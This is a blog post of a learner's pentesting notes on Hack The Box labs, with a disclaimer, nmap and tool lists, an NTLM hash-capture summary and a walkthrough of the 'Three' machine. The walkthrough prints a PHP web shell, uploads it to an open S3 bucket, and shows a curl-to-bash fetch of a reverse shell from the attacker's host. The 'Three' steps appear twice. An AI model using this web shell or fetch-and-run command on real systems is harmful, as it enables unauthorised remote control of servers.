Featured Post
Pentest- HACK THE BOX
- Get link
- Other Apps
Pentesting Notes - HACK THE BOX
Disclaimer:
- This document contains unedited notes and has not been formally proofread.
- The information provided in this document is intended to provide a basic understanding of certain technologies.
- Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
- Some websites and software may be flagged as malware by antivirus programs.
- The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
- The document is not a substitute for professional advice or expert analysis and should not be used as such.
- The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
- The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
- The author disclaim any liability for any damages or losses that may result from the use of this document or the information contained therein.
- The author reserve the right to update or change the information contained in this document at any time without prior notice.
- Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
- It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.
- Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
- It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
- It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
- It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.
References
- https://www.linkedin.com/learning/
- HACKTHEBOX
**********************************************************************************
Nmap Commands
- nmap -sS -D 10.1.0.1
- sudo nmap --script vuln
Security Testing: Nmap Security Scanning :-
- dig www.google.com = gives the IP address
- TCP Scan Types
- sudo nmap -sV -O -F 10.0.2.4
- nmap saving output files
- -v = allows to see progress by nmap
How to check a website:
Linux commands
- Ls
- Cd
- Grep
- Su
- Pwd
- Whoami
- Mv
- Cp
- Mkdir
- Cat
Tools:
- Nmap
- Nikto
- Zenmap
- Threader3000
- angry IP
- NetCat
- Hydra
- Wireshark
- Dirbuster
- Burp suite
- metasploit
HACKTHEBOX [HTB]
HTB - Responder
Microsoft employs NTLM
By taking advantage of a File Inclusion vulnerability present on a webpage hosted on a Windows machine, an attacker can collect the NetNTLMv2 hash used for authentication services implemented through technologies such as (New Technology LAN Manager) and Kerberos. The attacker can then utilize a tool called "Responder" to capture the NetNTLMv2 hash, which can subsequently be subjected to brute-force attacks using "John the Ripper" in an attempt to match the original password used to create the hash.
- -p- : This flag scans for all TCP ports ranging from 0-65535
- -sV : Attempts to determine the version of the service running on a port
- --min-rate : This is used to specify the minimum number of packets Nmap should send per second; it speeds up the scan as the number goes higher
- nmap -p- --min-rate 5000 -sV 10.129.37.49
File Inclusion Vulnerability
Responder
HTB - Three
- Enumeration
- nmap -sV 10.129.77.99
- To access the domain thetoppers.htb in our browser, we need to add an entry for it in the /etc/hosts file with its corresponding IP address. The /etc/hosts file is responsible for resolving hostnames to IP addresses, and it is queried before the DNS server by default. Therefore, we must add an entry in the /etc/hosts file for this domain to enable the browser to resolve its address.
- echo "10.129.77.99 thetoppers.htb" | sudo tee -a /etc/hosts
- Sub-domain enumeration
- Let's also add an
- entry for this sub-domain in the /etc/hosts file echo "10.129.77.99 s3.thetoppers.htb" | sudo tee -a /etc/hosts
- gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb
- echo "10.129.11.227 thetoppers.htb" | sudo tee -a /etc/hosts
- 10.129.11.227 thetoppers.htb
- apt install awscli
- aws configure
- aws --endpoint=http://s3.thetoppers.htb s3 ls
- gedit shell.php
- <?php system($_GET["cmd"]); ?>
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
upload: ./shell.php to s3://thetoppers.htb/shell.php
We can confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php. Let us try
executing the OS command id using the URL parameter cmd
http://thetoppers.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We can confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php. Let us try
executing the OS command id using the URL parameter cmd .
Let's get a reverse shell by creating a new file shell.sh containing the following bash reverse shell payload
which will connect back to our local machine on port 1337 .
We will start a ncat listener on our local port 1337 using the following command.
nc -nvlp 1337
let's start a web server on our local machine on port 8000
python3 -m http.server 8000
We can use the curl utility to fetch the bash reverse shell file from our local host and then pipe it to bash
in order to execute it. Thus, let us visit the following URL containing the payload in the browser.
http://thetoppers.htb/shell.php?cmd=curl%2010.10.15.203:8000/shell.sh|bash
The flag can be found at /var/www/flag.txt .
cat /var/www/flag.txt
Other way to get flag:
http://thetoppers.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
http://thetoppers.htb/shell.php?cmd=ls
http://thetoppers.htb/shell.php?cmd=ls+
images index.php shell.php
http://thetoppers.htb/shell.php?cmd=ls+..
flag.txt html
http://thetoppers.htb/shell.php?cmd=cat+../flag.txt
*******************
- nmap -sV 10.129.77.99
- Let's also add an
- entry for this sub-domain in the /etc/hosts file echo "10.129.77.99 s3.thetoppers.htb" | sudo tee -a /etc/hosts
- 10.129.11.227 thetoppers.htb
- aws configure
- aws --endpoint=http://s3.thetoppers.htb s3 ls
- <?php system($_GET["cmd"]); ?>
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
upload: ./shell.php to s3://thetoppers.htb/shell.php
We can confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php. Let us try
executing the OS command id using the URL parameter cmd
http://thetoppers.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We can confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php. Let us try
executing the OS command id using the URL parameter cmd .
Let's get a reverse shell by creating a new file shell.sh containing the following bash reverse shell payload
which will connect back to our local machine on port 1337 .
We will start a ncat listener on our local port 1337 using the following command.
nc -nvlp 1337
let's start a web server on our local machine on port 8000
python3 -m http.server 8000
We can use the curl utility to fetch the bash reverse shell file from our local host and then pipe it to bash
in order to execute it. Thus, let us visit the following URL containing the payload in the browser.
http://thetoppers.htb/shell.php?cmd=curl%2010.10.15.203:8000/shell.sh|bash
The flag can be found at /var/www/flag.txt .
cat /var/www/flag.txt
http://thetoppers.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
http://thetoppers.htb/shell.php?cmd=ls
http://thetoppers.htb/shell.php?cmd=ls+
images index.php shell.php
http://thetoppers.htb/shell.php?cmd=ls+..
flag.txt html
http://thetoppers.htb/shell.php?cmd=cat+../flag.txt
Comments
Post a Comment